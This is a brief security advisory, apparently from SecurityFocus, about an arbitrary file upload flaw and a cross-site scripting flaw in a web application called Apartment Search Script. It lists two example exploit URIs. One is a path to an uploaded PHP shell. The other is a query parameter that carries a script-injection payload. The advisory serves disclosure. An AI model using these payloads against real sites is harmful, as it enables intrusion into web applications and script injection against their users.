Apartment Search Script Arbitrary File Upload and Cross Site Scripting Vulnerabilities

Attackers may exploit this issue through a browser.

The following exploit URIs are available:

For the file-upload issue:
http://www.example.com/script_path/Member_Admin/logo/[id]your_shell.php

For the cross-site scripting issue:
http://www.example.com/listtest.php?r="><script>alert()</script>


 

Privacy Statement
Copyright 2010, SecurityFocus